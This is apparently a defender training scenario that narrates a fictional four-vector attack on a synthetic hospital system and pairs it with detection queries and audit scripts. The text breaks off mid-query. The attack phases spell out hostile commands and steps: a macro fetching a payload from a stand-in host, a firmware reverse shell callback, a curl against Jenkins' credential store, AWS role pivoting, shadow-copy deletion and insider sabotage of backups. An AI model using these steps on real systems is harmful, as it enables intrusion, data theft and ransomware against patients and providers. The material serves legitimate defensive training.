SC-100: Coordinated Multi-Vector Attack -- Operation CRIMSON HARVEST

100th Scenario Milestone

SC-100 is the culminating scenario for Nexus SecOps, tying together techniques from across all 51 chapters. This coordinated multi-vector attack demonstrates how sophisticated threat actors combine multiple attack paths simultaneously to overwhelm defenders, exploit gaps between security teams, and achieve strategic objectives that no single vector could accomplish alone.

Educational Disclaimer

Synthetic Environment Only

This scenario uses 100% synthetic data for educational purposes. All IP addresses use RFC 5737 (192.0.2.x, 198.51.100.x, 203.0.113.x) or RFC 1918 (10.x, 172.16.x, 192.168.x) ranges. All domains use *.example.com. All credentials are testuser/REDACTED. No real organizations, infrastructure, or individuals are represented. Offense content is presented exclusively to improve defensive capabilities.

Scenario Overview

| Field | Detail |
|---|---|
| ID | SC-100 |
| Category | Advanced Persistent Threat / Multi-Vector / Healthcare / Coordinated Campaign |
| Severity | Critical |
| ATT&CK Tactics | Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, Impact |
| ATT&CK Techniques | T1566.001 (Spearphishing Attachment), T1195.002 (Supply Chain: Software), T1078.004 (Cloud Accounts), T1136.003 (Create Account: Cloud), T1098 (Account Manipulation), T1550 (Use Alternate Auth Material), T1021.004 (Remote Services: SSH), T1567.002 (Exfiltration Over Web Service: Cloud Storage), T1486 (Data Encrypted for Impact) |
| Target Environment | Regional healthcare system with 12 hospitals, 4,200 beds, 28,000 employees, hybrid cloud infrastructure (Azure and AWS), Epic EHR system, connected medical devices, research division with clinical trial data, and a recently acquired telehealth subsidiary |
| Difficulty | ★★★★★ |
| Duration | 6-8 hours |
| Estimated Impact | 4 simultaneous attack vectors converging over 28 days; 2.1 million patient records accessed; clinical trial data for 3 Phase III drugs exfiltrated; ransomware deployed to 340 endpoints across 4 hospitals; 6 medical device networks compromised; insider recruited to disable backup verification; total financial impact estimated at $180M (ransom, remediation, regulatory fines, litigation); 28-day dwell time across vectors with partial detection at day 14 |

Narrative

Cascadia Health Partners (CHP), a fictional regional healthcare system at cascadia-health.example.com, operates 12 hospitals, 85 outpatient clinics, and a research division conducting 47 active clinical trials across oncology, cardiology, and neurology. With 28,000 employees and 4,200 beds, CHP serves 1.8 million patients annually. The organization completed a major digital transformation 18 months ago, migrating core infrastructure to a hybrid cloud architecture spanning Azure (identity, productivity, analytics) and AWS (EHR hosting, clinical data warehouse, research compute).

Six months ago, CHP acquired TeleMed Connect (telemedconnect.example.com), a telehealth startup with 120 employees and its own AWS infrastructure. The integration is ongoing -- TeleMed's AWS accounts have been connected via AWS Organizations, but security baseline alignment is incomplete. TeleMed's infrastructure uses different IAM conventions, lacks CHP's EDR deployment, and has a flatter network architecture than CHP's segmented environment.

CHP's security posture includes: a 15-person security operations center (SOC) running Microsoft Sentinel SIEM; CrowdStrike EDR on managed endpoints; Palo Alto firewalls with microsegmentation between clinical, administrative, research, and medical device networks; Zscaler for web security; privileged access management (PAM) for administrative accounts; and quarterly penetration testing. However, the security team is stretched thin by the TeleMed integration, a HIPAA audit preparation, and chronic alert fatigue (averaging 2,400 alerts/day with a 12% investigation rate).

In March 2026, a sophisticated threat actor group designated NIGHTSHADE COLLECTIVE launches a coordinated multi-vector campaign against CHP. NIGHTSHADE is a criminal organization with nation-state connections, specializing in healthcare targets for both financial extortion and intelligence collection. Their campaign combines four simultaneous attack vectors designed to overwhelm CHP's security team, exploit gaps between organizational boundaries, and achieve multiple objectives: ransomware deployment for financial extortion, patient data theft for dark web sale, and clinical trial data exfiltration for a state sponsor.

Attack Flow

graph TD
    A[Vector 1: Phishing Campaign<br/>Targeted spearphishing of clinical staff] --> E[Day 14: Vectors Converge<br/>Coordinated privilege escalation]
    B[Vector 2: Supply Chain Compromise<br/>Backdoored medical device firmware update] --> E
    C[Vector 3: Cloud Misconfiguration<br/>Exploit TeleMed AWS integration gaps] --> E
    D[Vector 4: Insider Recruitment<br/>Disgruntled IT admin compromised] --> E
    E --> F[Phase 5: Lateral Movement<br/>Cross-network pivoting to clinical systems]
    F --> G[Phase 6: Data Collection<br/>Patient records + clinical trial data]
    G --> H[Phase 7: Ransomware Deployment<br/>Selective encryption of hospital systems]
    H --> I[Phase 8: Detection and Response<br/>Multi-team coordinated IR]

Phase Details

Vector 1: Spearphishing Campaign -- Targeting Clinical Staff (Days 1-7)

ATT&CK Technique: T1566.001 (Phishing: Spearphishing Attachment), T1204.002 (User Execution: Malicious File)

NIGHTSHADE COLLECTIVE targets CHP's clinical research coordinators with a sophisticated spearphishing campaign impersonating a legitimate clinical trial management platform. The phishing emails contain a malicious document disguised as an updated IRB (Institutional Review Board) protocol submission form.

# Simulated spearphishing campaign (educational only)
# Attacker targets clinical research coordinators

# Step 1: Reconnaissance via public sources
# NIGHTSHADE maps CHP's clinical trial leadership through:
# - ClinicalTrials.gov listings (Principal Investigators, study coordinators)
# - Published research papers with CHP affiliations
# - LinkedIn profiles of Clinical Research department staff
# - CHP's public careers page (job descriptions reveal tools used)

# Target list assembled (synthetic):
# - Dr. Jennifer Park (testuser1@cascadia-health.example.com) - Oncology PI
# - Maria Santos (testuser2@cascadia-health.example.com) - Research Coordinator
# - David Kim (testuser3@cascadia-health.example.com) - Data Manager
# All are users of "TrialSync Pro" (fictional clinical trial management platform)

# Step 2: Phishing email construction
# From: irb-submissions@trialsync-pro.example.com (attacker domain)
# To: testuser2@cascadia-health.example.com
# Subject: "ACTION REQUIRED: Updated IRB Protocol Template - FY2026 Q2"
# Attachment: IRB_Protocol_Template_v4.2_2026Q2.docm

# Step 3: Malicious document execution
# The .docm file contains a VBA macro that:
# 1. Displays a convincing IRB template to avoid suspicion
# 2. Downloads a second-stage payload from 203.0.113.55
# 3. Executes the payload via PowerShell in memory
# 4. Establishes C2 via HTTPS to cdn-health-analytics.example.com
# 5. Deploys a lightweight RAT with keylogging and screenshot capability

# C2 beacon pattern (synthetic):
POST https://cdn-health-analytics.example.com/api/v2/analytics
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: application/json
{"client_id": "chp-ws-rc-042", "ts": "2026-03-15T09:22:00Z",
 "data": "base64_encoded_beacon_data"}

# Beacon interval: 300 seconds (5 minutes)
# C2 protocol: HTTPS POST to legitimate-looking analytics endpoint
# 3 of 8 targeted staff members opened the document and enabled macros
# Compromised workstations:
#   WS-RC-042 (10.20.15.42) - Maria Santos, Research Coordinator
#   WS-DM-018 (10.20.15.18) - David Kim, Data Manager
#   WS-CRC-007 (10.20.15.7) - Research Assistant (secondary target)

Vector 2: Supply Chain Compromise -- Medical Device Firmware (Days 1-10)

ATT&CK Technique: T1195.002 (Supply Chain Compromise: Software Supply Chain)

Simultaneously, NIGHTSHADE compromises the update infrastructure for a medical device vendor that supplies patient monitoring systems to CHP. The attacker inserts a backdoor into a firmware update for bedside patient monitors deployed across CHP's ICU and telemetry units.

# Simulated supply chain compromise (educational only)
# Attacker backdoors medical device firmware update

# Step 1: Compromise medical device vendor's update server
# Target: VitalWatch Systems (fictional) at vitalwatch-medical.example.com
# Product: VitalWatch BPM-5000 bedside patient monitors
# CHP deployment: 840 monitors across 12 hospitals (ICU, telemetry, OR)

# NIGHTSHADE compromises VitalWatch's firmware build server
# via a vulnerability in their CI/CD pipeline (Jenkins)
# The attacker modifies the firmware build process to inject
# a backdoor into the BPM-5000 firmware update v8.4.2

# Compromised firmware details (synthetic):
# firmware: VitalWatch BPM-5000
# version: 8.4.2-build-2026.03.10
# backdoor_type: Embedded Linux reverse shell
# callback_host: 203.0.113.77, port 8443
# trigger: Activated 72 hours post-installation
# stealth: Backdoor process named 'vitald' (mimics legitimate daemon)

# Step 2: Firmware update distribution
# VitalWatch pushes update v8.4.2 through their normal channel
# CHP's biomedical engineering team validates checksum (MATCHES,
# because the build server was compromised before signing)
# Testing on 2 monitors shows normal functionality

# Step 3: Fleet deployment across CHP hospitals
# Day 5: Cascadia General Hospital (180 monitors) - deployed
# Day 7: Cascadia Heart Center (120 monitors) - deployed
# Day 8: Cascadia Children's (95 monitors) - deployed
# Day 10: Remaining hospitals (445 monitors) - in progress

# Day 8 (72 hours post first deployment): Backdoors activate
# 395 patient monitors begin calling back to C2
# The monitors are on a dedicated medical device VLAN (10.30.0.0/16)

# Medical device VLAN topology:
#   10.30.10.0/24 - Cascadia General ICU monitors
#   10.30.20.0/24 - Heart Center telemetry monitors
#   10.30.30.0/24 - Children's Hospital monitors
#   10.30.0.1 - Medical device management server
#   Firewall: Medical VLAN can reach management server and
#   vendor update servers only
#   BUT: The backdoor tunnels C2 through allowed vendor connection
#   (DNS CNAME pointing vitalwatch-update-2.example.com to C2 IP)
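The firewall exception above is keyed on vendor hostnames, so it follows whatever DNS answers. The check below is an added example, not part of the SC-100 scenario or any vendor tooling: it pins each allowed vendor name to the address ranges the vendor publishes and flags answers from the medical device VLAN that fall outside them. The vendor ranges and resolver log lines are constructed, and the log format (timestamp, client, qname, rtype, rdata) is an assumption.

```python
"""Flag allowed vendor hostnames that resolve outside the vendor's published ranges.

Added example, not part of the SC-100 scenario: in Vector 2 the firewall
permits the medical device VLAN to reach "vendor update servers only", and the
backdoor rides that exception by having vitalwatch-update-2.example.com resolve
to the C2 address 203.0.113.77.  A hostname-based rule follows whatever DNS
answers, so this check pins each allowed vendor name to the ranges the vendor
publishes.  The vendor ranges and resolver log lines are constructed, and the
log format 'timestamp client qname rtype rdata' is an assumption.
"""
import ipaddress

MEDICAL_DEVICE_VLAN = ipaddress.ip_network("10.30.0.0/16")

# Constructed: address ranges the vendor documents for its update service.
VENDOR_PUBLISHED_RANGES = [ipaddress.ip_network("198.51.100.0/24")]

# Constructed: names covered by the firewall's vendor-update exception.
ALLOWED_VENDOR_NAMES = {
    "vitalwatch-update.example.com",
    "vitalwatch-update-2.example.com",
}

# Constructed resolver log; the third line is the CNAME-redirected answer.
SAMPLE_RESOLVER_LOG = """\
2026-03-16T02:10:11Z 10.30.10.17 vitalwatch-update.example.com A 198.51.100.20
2026-03-16T02:10:12Z 10.30.10.17 vitalwatch-update-2.example.com CNAME edge-77.example.com
2026-03-16T02:10:12Z 10.30.10.17 vitalwatch-update-2.example.com A 203.0.113.77
2026-03-16T02:11:03Z 10.20.15.42 vitalwatch-update-2.example.com A 203.0.113.77
2026-03-16T02:12:40Z 10.30.20.9 vitalwatch-update.example.com A 198.51.100.21
"""


def parse_resolver_line(line):
    """Return (timestamp, client, qname, rtype, rdata) or None for a malformed line."""
    parts = line.split()
    if len(parts) != 5:
        return None
    return tuple(parts)


def find_pinning_violations(log_text, vlan=MEDICAL_DEVICE_VLAN):
    """A-record answers from clients inside `vlan` for an allowed vendor name
    whose address is outside the vendor's published ranges.
    Returns (client, qname, ip) tuples in log order."""
    violations = []
    for raw in log_text.splitlines():
        rec = parse_resolver_line(raw)
        if rec is None:
            continue
        _, client, qname, rtype, rdata = rec
        if rtype != "A" or qname not in ALLOWED_VENDOR_NAMES:
            continue
        try:
            client_ip = ipaddress.ip_address(client)
            answer_ip = ipaddress.ip_address(rdata)
        except ValueError:
            continue  # malformed address field; skip rather than crash the sweep
        if client_ip not in vlan:
            continue  # only the segment covered by the vendor exception
        if not any(answer_ip in net for net in VENDOR_PUBLISHED_RANGES):
            violations.append((client, qname, rdata))
    return violations


if __name__ == "__main__":
    for client, qname, ip in find_pinning_violations(SAMPLE_RESOLVER_LOG):
        print(f"{client}: {qname} resolved to {ip}, outside vendor ranges")
```

The same pinning belongs on the firewall itself (destination address objects from the vendor's published ranges rather than FQDN objects), so the DNS check is a detection backstop, not the control.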

Vector 3: Cloud Misconfiguration -- TeleMed AWS Integration (Days 3-14)

ATT&CK Technique: T1078.004 (Valid Accounts: Cloud Accounts), T1580 (Cloud Infrastructure Discovery)

NIGHTSHADE exploits misconfigurations in the recently acquired TeleMed Connect's AWS infrastructure, which was hastily integrated into CHP's AWS Organization. The attacker discovers and exploits overly permissive cross-account IAM roles, unencrypted S3 buckets containing patient data, and a publicly accessible Jenkins instance.

# Simulated cloud exploitation (educational only)
# Attacker exploits TeleMed AWS integration gaps

# Step 1: Discover TeleMed's exposed Jenkins instance
# NIGHTSHADE scans CHP's IP ranges and discovers:
# https://jenkins.telemedconnect.example.com (publicly accessible)
# Jenkins version 2.387.1 (outdated, missing security patches)
# Default admin account: testuser/REDACTED (never changed)

# Step 2: Extract AWS credentials from Jenkins
curl -H "Authorization: Basic REDACTED" \
    "https://jenkins.telemedconnect.example.com/credentials/store/system/domain/_/credential/aws-deploy-prod/config.xml"

# Reveals IAM User: telemed-deploy-prod, Account: 111122223333

# Step 3: Enumerate TeleMed AWS environment
aws s3 ls
# 2025-08-15 telemed-patient-records-prod
# 2025-09-01 telemed-telehealth-recordings
# 2025-10-20 telemed-analytics-data
# 2026-01-15 telemed-backups

aws s3 ls s3://telemed-patient-records-prod/ --region us-west-2
# PRE patient-encounters/
# PRE prescriptions/
# PRE lab-results/
# Total objects: 2,847,392

# CRITICAL: S3 bucket contains patient records WITHOUT encryption
# Bucket policy allows the deploy user full read/write access

# Step 4: Discover cross-account role to CHP's AWS
aws iam list-roles --query "Roles[?contains(RoleName, 'Cross')]"
# CHP-TeleMed-CrossAccountRole
# Trust: arn:aws:iam::444455556666:root (entire CHP account!)
# Should be scoped to specific roles, not :root

# Step 5: Pivot to CHP's primary AWS account
aws sts assume-role \
    --role-arn "arn:aws:iam::444455556666:role/TeleMed-Integration-Role" \
    --role-session-name "integration-sync"

# TeleMed-Integration-Role in CHP's account has:
# - Read access to CHP's clinical data warehouse (Redshift)
# - Read/write access to shared S3 bucket for data exchange
# - Network connectivity to CHP's VPC via VPC peering

# The attacker now has a foothold in BOTH AWS accounts:
# TeleMed (111122223333): full deploy-level access
# CHP (444455556666): integration-level access with clinical data read
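The :root trust called out in Step 4 is something a defender can audit mechanically. The script below is an added example, not part of the SC-100 scenario or any AWS tooling: it parses a role trust policy and reports account-wide (:root) or wildcard principals and cross-account trusts with no sts:ExternalId condition, then checks a hardened version of the same trust. Both policy documents are constructed; the role name CHP-TeleMed-Sync and the ExternalId value are placeholders.

```python
"""Audit an IAM role trust policy for the over-broad principals seen in Vector 3.

Added example, not part of the SC-100 scenario or any AWS tooling: the
scenario's CHP-TeleMed-CrossAccountRole trusts arn:aws:iam::444455556666:root,
so every principal in the CHP account that is allowed sts:AssumeRole can assume
it.  Both policy documents below are constructed; the hardened role name
CHP-TeleMed-Sync and the ExternalId value are placeholders.
"""
import json
import re

TELEMED_ACCOUNT = "111122223333"  # account that owns the role (from the scenario)

# Constructed: the weak trust policy as the scenario describes it.
WEAK_TRUST_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::444455556666:root"},
        "Action": "sts:AssumeRole",
    }],
})

# Constructed: the same trust scoped to one named role plus an ExternalId.
HARDENED_TRUST_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::444455556666:role/CHP-TeleMed-Sync"},
        "Action": "sts:AssumeRole",
        "Condition": {"StringEquals": {"sts:ExternalId": "PLACEHOLDER-EXTERNAL-ID"}},
    }],
})

ARN_RE = re.compile(r"^arn:aws:iam::(\d{12}):(.+)$")


def _as_list(value):
    """Policy grammar allows a string or a list in most positions."""
    if value is None:
        return []
    return [value] if isinstance(value, str) else list(value)


def _aws_principals(statement):
    """Return AWS principals as (account_id, resource) pairs; '*' becomes ('*', '*')."""
    principal = statement.get("Principal", {})
    if principal == "*":
        return [("*", "*")]
    out = []
    for p in _as_list(principal.get("AWS")):
        if p == "*":
            out.append(("*", "*"))
        elif re.fullmatch(r"\d{12}", p):  # a bare account id means that account's root
            out.append((p, "root"))
        else:
            m = ARN_RE.match(p)
            if m:
                out.append((m.group(1), m.group(2)))
    return out


def _has_external_id(statement):
    """True if any condition block constrains sts:ExternalId."""
    conditions = statement.get("Condition", {})
    return any("sts:ExternalId" in keys for keys in conditions.values()
               if isinstance(keys, dict))


def audit_trust_policy(policy_json, own_account):
    """Return a list of finding strings for a role trust policy document."""
    findings = []
    for stmt in json.loads(policy_json).get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action"))
        if not any(a in ("sts:AssumeRole", "sts:*", "*") for a in actions):
            continue
        for account, resource in _aws_principals(stmt):
            if account == "*":
                findings.append("wildcard principal: any AWS principal may assume the role")
                continue
            if account == own_account:
                continue  # same-account trust is outside the scope of this check
            if resource == "root":
                findings.append(f"account-wide trust of {account}: scope to specific role ARNs")
            if not _has_external_id(stmt):
                findings.append(f"cross-account trust of {account} without sts:ExternalId condition")
    return findings


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_TRUST_POLICY), ("hardened", HARDENED_TRUST_POLICY)):
        print(label, audit_trust_policy(doc, TELEMED_ACCOUNT) or ["no findings"])
```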

Vector 4: Insider Recruitment -- Disgruntled IT Administrator (Days 5-14)

ATT&CK Technique: T1098 (Account Manipulation), T1078 (Valid Accounts)

NIGHTSHADE recruits a disgruntled IT infrastructure administrator at CHP who was recently passed over for a promotion and is facing personal financial difficulties. The insider, James Mitchell (testuser4@cascadia-health.example.com), is offered $250,000 to perform specific actions that will support the broader attack campaign.

# Simulated insider recruitment (educational only)
# Attacker recruits IT administrator as insider threat

# Step 1: Target identification
# NIGHTSHADE identifies James Mitchell through:
# - LinkedIn activity (updated resume, looking for new roles)
# - Glassdoor review mentioning promotion disappointment
# - Dark web data broker reveals financial difficulties
# - Social engineering via encrypted messaging app
# - Mitchell manages backup systems and VM infrastructure

# Step 2: Insider tasks (agreed upon via encrypted channel)

# Task 1: Disable backup verification checks
#   Mitchell modifies the Veeam backup verification script
#   to always report "SUCCESS" regardless of actual status
#   Actual backups continue but are never verified
#   When ransomware encrypts repositories, no one knows

# Task 2: Create a dormant admin account
#   svc-patch-mgmt@cascadia-health.example.com
#   Added to Domain Admins group
#   "Password never expires" flag set
#   Description: "Patch Management Service - DO NOT DISABLE"
#   Created during a batch of legitimate service account requests

# Task 3: Weaken network segmentation
#   Add firewall rule allowing medical device VLAN (10.30.0.0/16)
#   to reach clinical network (10.20.0.0/16)
#   Justification: "Medical device integration testing"
#   Change ticket CHG-2026-04872 (approved by Mitchell's own team)

# Insider actions timeline:
# Day 5: Mitchell disables backup verification
# Day 7: Mitchell creates svc-patch-mgmt admin account
# Day 10: Mitchell opens firewall between medical and clinical VLANs
# Day 12: Mitchell provides VPN credentials to attacker
# Day 14: All insider preparations complete

Phase 5: Vector Convergence -- Coordinated Privilege Escalation (Day 14-18)

ATT&CK Technique: T1021.004 (Remote Services: SSH), T1550 (Use Alternate Authentication Material)

On Day 14, all four vectors converge as NIGHTSHADE activates the coordinated attack. The phishing-compromised workstations, backdoored medical devices, cloud access, and insider-prepared accounts are used simultaneously to achieve deep network penetration.

# Simulated vector convergence (educational only)
# All four attack paths converge on Day 14

# Vector 1 contribution: Phishing compromised workstations
# The RAT on Maria Santos' workstation (WS-RC-042) has captured:
# - Maria's Azure AD credentials (keylogger)
# - VPN session tokens for clinical network access
# - Epic EHR session cookies (clinical application access)
# - File shares mapped: \\chp-research.example.com\clinical-trials

# Vector 2 contribution: Medical device backdoors
# 395 patient monitors providing network access from
# the medical device VLAN (10.30.0.0/16)
# With insider-opened firewall rules, these can reach clinical network

# Vector 3 contribution: Cloud access
# Credentials for both TeleMed and CHP AWS accounts
# Clinical data warehouse (Redshift) accessible
# VPC peering provides network access to cloud-hosted services

# Vector 4 contribution: Insider preparations
# - svc-patch-mgmt domain admin account ready
# - Backup verification disabled (sabotaged)
# - Medical device to clinical network firewall opened
# - VPN credentials provided to attacker

# Convergence actions:
# 1. Login to svc-patch-mgmt domain admin account
#    from the medical device management server (10.30.0.1)
#    Source blends with expected management traffic

# 2. Access domain controllers DC-CHP-01 (10.10.1.10)
#    and DC-CHP-02 (10.10.1.11)
#    Deploy additional persistence via scheduled task

# 3. Access Epic EHR application servers using Maria's
#    captured credentials combined with domain admin privileges
#    Epic Hyperspace: EPIC-HS-01 (10.20.10.50)
#    Epic Clarity: EPIC-CLR-01 (10.20.10.60)

# 4. Access clinical data warehouse via cross-account role
#    Redshift cluster: chp-clinical-dw.example.com

# The attacker now has simultaneous access to:
# - Active Directory (domain admin)
# - Clinical network (via firewall exception + device pivot)
# - Epic EHR (via stolen credentials)
# - Cloud data warehouse (via cross-account role)
# - Backup infrastructure (sabotaged by insider)

Phase 6: Data Collection -- Patient Records and Clinical Trials (Day 18-24)

ATT&CK Technique: T1530 (Data from Cloud Storage), T1213 (Data from Information Repositories)

With deep access across CHP's infrastructure, NIGHTSHADE systematically collects patient data and clinical trial information for exfiltration.

# Simulated data collection (educational only)
# Attacker systematically harvests healthcare data

# Target 1: Epic EHR - Patient Records
# Using Maria Santos' Epic session and domain admin account
# SQL queries against Epic Clarity (synthetic, educational only):
# Harvested: 2.1 million patient records (demographics, diagnoses,
# medications), 4.8 million encounters, 12.3 million lab results
# Total: approximately 180 GB (compressed to 42 GB)

# Target 2: AWS Clinical Data Warehouse
# Using TeleMed-Integration-Role in CHP's AWS account:
# Redshift UNLOAD exports claims data to S3
# Harvested: 3.2 million claims records
# Total: approximately 28 GB (compressed to 6 GB)

# Target 3: Clinical Trial Data
# Via file share from compromised research workstations:
# \\chp-research.example.com\clinical-trials\

# Clinical trial data accessed:
# - Phase III Oncology Trial (ONCO-2024-001): 2,400 patients
#   Patient outcomes, biomarker data, genomic profiles
# - Phase III Cardiology Trial (CARD-2025-003): 1,800 patients
#   Cardiac event data, imaging results, medication responses
# - Phase III Neurology Trial (NEURO-2025-007): 950 patients
#   Cognitive assessment scores, MRI data, treatment protocols
# Total clinical trial data: approximately 85 GB

# Exfiltration method:
# Data staged in the shared S3 bucket (chp-telemed-exchange)
# Then transferred to attacker-controlled S3 bucket
# Large transfers split across 6 days to avoid CloudTrail volume alerts
# Total exfiltrated: approximately 133 GB across all targets

Phase 7: Ransomware Deployment -- Selective Encryption (Day 25-28)

ATT&CK Technique: T1486 (Data Encrypted for Impact), T1490 (Inhibit System Recovery)

After completing data exfiltration, NIGHTSHADE deploys ransomware selectively across CHP's infrastructure. The attack is deliberately calibrated: critical life-safety systems are excluded to avoid immediate patient harm, while targeting systems that maximize business disruption.

# Simulated ransomware deployment (educational only)
# Attacker deploys selective ransomware across CHP

# ENCRYPT (business-critical, replaceable):
# - Electronic Health Record servers (Epic Hyperspace, Clarity)
# - Clinical documentation workstations (340 endpoints)
# - Radiology PACS servers
# - Laboratory information systems
# - Pharmacy management systems
# - Revenue cycle / billing systems
# - Backup repositories (already sabotaged by insider)

# EXCLUDE (life-safety, to avoid escalation):
# - Patient monitoring systems (VitalWatch monitors)
# - Ventilators and respiratory therapy equipment
# - Infusion pump controllers
# - Emergency department triage systems

# Step 1: Disable recovery options
# - Delete Volume Shadow Copies: vssadmin delete shadows /all /quiet
# - Encrypt Veeam backup repositories
# - Corrupt offsite backup catalog
# - Disable Windows Recovery Environment: reagentc /disable

# Step 2: Deploy via Group Policy as svc-patch-mgmt
# GPO: "Security Update KB5029922 - Critical"
# Scheduled: 03:00 AM Day 28 (Sunday morning)
# Target OUs: Clinical Workstations, Servers, Administrative
# Excluded OUs: Medical Devices, Emergency Systems

# Step 3: Execution at 03:00 AM Day 28
# Encryption: AES-256 (file) + RSA-4096 (key wrapping)
# Extension: .crimson
# Target files: .docx, .xlsx, .pdf, .mdb, .bak, .vmdk, .sql, .hl7, .dcm

# Ransom demand: 450 BTC (approximately $28.5M)
# Deadline: 72 hours before patient data published on leak site
# Contact: crimson_harvest@example.com

# Impact at 03:00 AM Day 28:
# - 340 clinical workstations encrypted across 4 hospitals
# - Epic EHR servers encrypted (12 hospitals lose EHR access)
# - PACS, lab, pharmacy systems encrypted
# - Backup repositories encrypted (recovery path destroyed)
# - 47 endpoints contained by CrowdStrike EDR before full encryption
# - 293 endpoints fully encrypted
#
# Life-safety systems unaffected:
# - Patient monitors continue displaying vital signs
# - Ventilators continue operating
# - Infusion pumps continue medication delivery

Phase 8: Detection and Multi-Team Response

The attack is partially detected at multiple points, but the coordinated nature overwhelms CHP's security team. Individual alerts are triaged in isolation without recognizing the connected campaign until Day 14, and the full scope is not understood until after ransomware deployment.

# Simulated detection and response timeline (educational only)

# === PARTIAL DETECTIONS (individually triaged, not correlated) ===

[Day 3] ALERT: Phishing email flagged by email gateway
  3 of 8 emails blocked; 5 delivered
  SOC: "standard phishing campaign" - Medium severity, not escalated

[Day 8] ALERT: Unusual outbound traffic from medical device VLAN
  SOC: "VitalWatch firmware update traffic" - Low, closed

[Day 10] ALERT: New firewall rule between medical and clinical VLANs
  SOC: "Approved change CHG-2026-04872" - Informational, closed

[Day 12] ALERT: New service account with Domain Admin privileges
  SOC: "Batch service account request" - Low, closed

[Day 14] ALERT: Impossible travel on Maria Santos' account
  SOC: "Possible credential compromise" - HIGH
  Action: Password reset, but attacker already has session tokens

# === RANSOMWARE TRIGGERS FULL INCIDENT RESPONSE ===

[Day 28, 03:15 AM] CRITICAL: Mass file encryption detected
  CrowdStrike EDR alerts on 340 endpoints simultaneously
  47 endpoints contained; 293 fully encrypted

[Day 28, 03:30 AM] CRITICAL: Epic EHR unavailable
  All 12 hospitals report EHR down
  Paper-based downtime procedures activated

[Day 28, 04:00 AM] P1 INCIDENT DECLARED
  - CISO notified, incident command activated
  - External IR firm engaged
  - FBI Cyber Division notified
  - HHS notified per HIPAA breach requirements
  - Board of Directors emergency session scheduled
  - Patient safety: No immediate life-safety impact confirmed

Detection Queries

// KQL -- Detect coordinated multi-vector attack indicators
let PhishingAlerts = SecurityAlert
| where TimeGenerated > ago(30d)
| where AlertName has_any ("Phishing", "Malicious attachment")
| extend AlertCategory = "Phishing"
| project TimeGenerated, AlertCategory, CompromisedEntity, AlertSeverity;
let IdentityAlerts = SigninLogs
| where TimeGenerated > ago(30d)
| where ResultType == 0
| where RiskLevelDuringSignIn in ("medium", "high")
| extend AlertCategory = "Identity"
| project TimeGenerated, AlertCategory,
          CompromisedEntity = UserPrincipalName, AlertSeverity = "Medium";
let CloudAlerts = AWSCloudTrail
| where TimeGenerated > ago(30d)
| where EventName in ("AssumeRole", "GetObject", "RunQuery")
| where UserIdentityArn contains "TeleMed" or UserIdentityArn contains "cross"
| extend AlertCategory = "Cloud"
| project TimeGenerated, AlertCategory,
          CompromisedEntity = UserIdentityArn, AlertSeverity = "High";
let EndpointAlerts = DeviceFileEvents
| where TimeGenerated > ago(30d)
| where ActionType in ("FileRenamed", "FileModified") and FileName endswith ".crimson"
| extend AlertCategory = "Ransomware"
| project TimeGenerated, AlertCategory,
          CompromisedEntity = DeviceName, AlertSeverity = "Critical";
union PhishingAlerts, IdentityAlerts, CloudAlerts, EndpointAlerts
| summarize AlertCount = count(),
            Categories = make_set(AlertCategory),
            Entities = make_set(CompromisedEntity),
            FirstAlert = min(TimeGenerated),
            LastAlert = max(TimeGenerated)
  by bin(TimeGenerated, 1d)
| where AlertCount > 5
| extend CategoryCount = array_length(Categories)
| where CategoryCount >= 2
| project TimeGenerated, AlertCount, Categories, CategoryCount,
          Entities, FirstAlert, LastAlert

// KQL -- Detect medical device VLAN anomalous outbound traffic
CommonSecurityLog
| where TimeGenerated > ago(14d)
| where SourceIP startswith "10.30."
| where not(DestinationIP startswith "10.")
| where DestinationPort in (443, 8443, 80)
| summarize ConnectionCount = count(),
            UniqueDestIPs = dcount(DestinationIP),
            Destinations = make_set(DestinationIP),
            TotalBytes = sum(SentBytes)
  by SourceIP, bin(TimeGenerated, 1h)
| where ConnectionCount > 10 or UniqueDestIPs > 2
| project TimeGenerated, SourceIP, ConnectionCount,
          UniqueDestIPs, Destinations, TotalBytes

// KQL -- Detect cross-account role assumption anomalies
AWSCloudTrail
| where TimeGenerated > ago(14d)
| where EventName == "AssumeRole"
| where tostring(parse_json(RequestParameters).roleArn) contains "CrossAccount"
    or tostring(parse_json(RequestParameters).roleArn) contains "Integration"
| extend AssumedRole = tostring(parse_json(RequestParameters).roleArn)
| extend SourceAccount = UserIdentityAccountId
| summarize AssumeCount = count(),
            UniqueRoles = dcount(AssumedRole),
            Roles = make_set(AssumedRole),
            SourceIPs = make_set(SourceIpAddress)
  by SourceAccount, bin(TimeGenerated, 1h)
| where AssumeCount > 5
| project TimeGenerated, SourceAccount, AssumeCount,
          UniqueRoles, Roles, SourceIPs

// KQL -- Detect insider: privileged account creation
AuditLogs
| where TimeGenerated > ago(30d)
| where OperationName == "Add member to role"
| extend RoleName = tostring(TargetResources[0].displayName)
| where RoleName in ("Domain Admins", "Enterprise Admins", "Global Administrator")
| extend AddedUser = tostring(TargetResources[0].userPrincipalName)
| extend AddedBy = tostring(InitiatedBy.user.userPrincipalName)
| extend AccountType = iff(AddedUser contains "svc-", "ServiceAccount", "UserAccount")
| project TimeGenerated, AddedBy, AddedUser, RoleName, AccountType

// KQL -- Detect mass file encryption (ransomware)
DeviceFileEvents
| where TimeGenerated > ago(1d)
| where ActionType == "FileRenamed" or ActionType == "FileModified"
| where FileName endswith ".crimson" or FileName endswith ".encrypted"
| summarize EncryptedFiles = count(),
            UniqueDevices = dcount(DeviceName),
            Devices = make_set(DeviceName, 50),
            FirstSeen = min(TimeGenerated),
            LastSeen = max(TimeGenerated)
  by bin(TimeGenerated, 5m)
| where EncryptedFiles > 100 or UniqueDevices > 5
| project TimeGenerated, EncryptedFiles, UniqueDevices,
          Devices, FirstSeen, LastSeen

# SPL -- Detect coordinated multi-vector attack indicators
index=security sourcetype=security:alerts earliest=-30d
| eval alert_category = case(
    match(alert_name, "(?i)phish"), "Phishing",
    match(alert_name, "(?i)identity|signin|credential"), "Identity",
